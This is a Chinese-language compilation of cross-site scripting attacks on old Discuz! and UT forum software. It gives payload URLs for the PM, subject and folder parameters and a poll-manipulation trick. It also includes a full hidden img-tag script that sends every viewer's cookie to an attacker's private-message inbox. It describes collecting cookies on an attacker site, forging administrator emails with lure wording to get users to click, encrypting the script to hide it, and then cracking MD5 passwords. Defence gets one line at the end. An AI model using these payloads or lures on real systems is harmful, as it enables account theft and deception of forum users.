在discuz！的發(fā)貼、回貼、PM等中的subject都沒有經(jīng)過過濾，所以也可以添加代碼。  
例如  
http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22  

效果是首先彈出自己的cookie  
利用方法：把上述代碼放置到img中。  

適用版本：discuz！2.x  
discuz！3.x  
一種利用discuz！2.0漏洞進(jìn)行欺騙獲得cookie的嘗試  

通過測試XXXFan論壇的PM功能存在一個安全漏洞，具體描述如下：  
XXXFan的給某個會員發(fā)送悄悄的鏈接如下（假定這個會員名字為XXXFan）  
http://XXX/pm.php?action=send&username=XXXFan  

因為論壇程序?qū)T名字沒有進(jìn)行過濾，而是直接顯示在發(fā)送到欄目中（TO：），所以可以在名字后面加上script代碼。例如  

http://XXX/pm.php?action=send&username=XXXFan ";><script>alert(document．.cookie)</script><b%20"  

上面的鏈接點擊以后首先彈出的是自己的cookie內(nèi)容。  
當(dāng)然我們可以先在自己的站點上構(gòu)造一個程序來收集cookie，類似于  
getcookie.php?cookie=  

但是如何來誘使會員點擊呢，如果簡單的放在論壇上，太容易被識別。所以可以利用discuz論壇程序的另外一個功能，“帖子介紹給朋友”功能。  

因為discuz的這個功能對填寫的emial地址沒有進(jìn)行任何過濾、辨別和模版，可以偽造任何人給別人發(fā)信，安全性很高。利用這個功能我們就可以偽造ExploitFan的管理員給某個會員發(fā)一封信，誘使會員點擊我們準(zhǔn)備的URL，如果誘使就看自己的手段了，例如可以說“論壇正在測試新功能，請您協(xié)助點擊上面地址，我們會在后臺記錄您的點擊在合適的時間會給您增加積分以做獎勵”等等。  

因為鏈接地址是XXXFan的，而且發(fā)信人和郵件地址都是XXXFan的官方地址，所以可信度非常高，而且不會留下任何把柄。當(dāng)然為了更高的安全性，可以在<script>里的內(nèi)容加密，以進(jìn)一步增加隱蔽性。  

至于得到cookie如何做，可以嘗試cookie欺騙或者是暴力破解MD5密碼  

本方法適用于大部分使用discuz2.0的論壇,至于discuz3.0的利用方法請參與在我以前發(fā)表的discuz！悄悄話漏洞  
【BUG】Discuz!投票的BUG  
投票可以用  
misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n  
（n為選項，從0開始）  
的方式通過URL來直接投票  

但是如果n>最大選項呢，嘻嘻～  
照樣提交成功，不過增加了一個標(biāo)題為空的選項  

效果見：  
http://discuz.net/viewthread.php?tid=20020&sid=dymPEc  
（那個最后的空白的是我剛加的）  

該漏洞存在的版本：  
Discuz!3.X  
Discuz!2.X(可能，沒有測試過）  
Discuz!的代碼漏洞  
這是接著昨天發(fā)現(xiàn)的漏洞所展開的，第一發(fā)現(xiàn)者（PK0909)。  

具體的描述就不說了，下面是一個簡單的測試代碼。  

http://www.xxxx.net/phpbbs/post.php?action...%3C%2Fscript%3E  

上面的代碼是顯示出自己的cookie  

下面是在某個比較有名的論壇的測試代碼，無論誰察看該網(wǎng)頁都會把cookie送到指定的會員短信箱里，隱蔽性很好，就是如果有人引用你的貼，哈哈～這里都會跑出來，露餡了  
[ img]http://xxx.com/xx.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(document．.cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img]  

發(fā)現(xiàn)discuz！UT 跨域站點的腳本漏洞－－短消息篇有關(guān)跨域站點的腳本漏洞，已經(jīng)算是非常平成并普遍的漏洞了。  
有關(guān)具體的消息可以參閱：  
http://www.cert.org/advisories/CA-2000-02.html  
下面針對Discuz、UT論壇程序的悄悄話部分加以說明  

漏洞適應(yīng)版本：  
Discuz1.X  
Discuz!2.0(0609,0820版)  
Discuz!3.X  
UT 1.0  

漏洞描述：  

discuz！給指定會員發(fā)送悄悄話使用的是類似http://www.XXXX.net/phpbbs/pm.php?action=send&username=name 的語句，但是name沒有經(jīng)過過濾直接顯示在發(fā)送短消息的頁面中，這就給偷cookie或者更嚴(yán)重的破壞打開了方便之門。  

Discuz!3.X已經(jīng)改為http://XXX.net/pm.php?action=send&uid=XXXX類似的語句，避免了這個漏洞，但是在選擇短信文件夾的時候卻沒有經(jīng)過過濾。同樣產(chǎn)生了上面的漏洞  


例  
http://www.XXXX.net/phpbbs/pm.php?action=s...d&username=name %22%3E%3Cscript%3Ealert(document．.cookie)%3C/script%3E%3Cb%22[/url]  
，上面的例子是顯示自己的cookie。（針對Discuz!1.X Discuz!2.X)  

http://XXX.net/pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22  
顯示自己的cookie。（針對Discuz!3.X)  

UT雖然在主題上經(jīng)過了過濾，也就是說把%27轉(zhuǎn)換為'；但是其收件人卻沒有過濾，所以同樣有類似的漏洞。例子略。(在不同的UT論壇上發(fā)現(xiàn)其代碼不盡相同，但是總的來說都有類似的漏洞）  


危害度：中弱  

預(yù)防辦法：  
點擊超級鏈接時請注意其真實內(nèi)容。更多的安全補(bǔ)丁請密切關(guān)注官方論壇。 

最新評論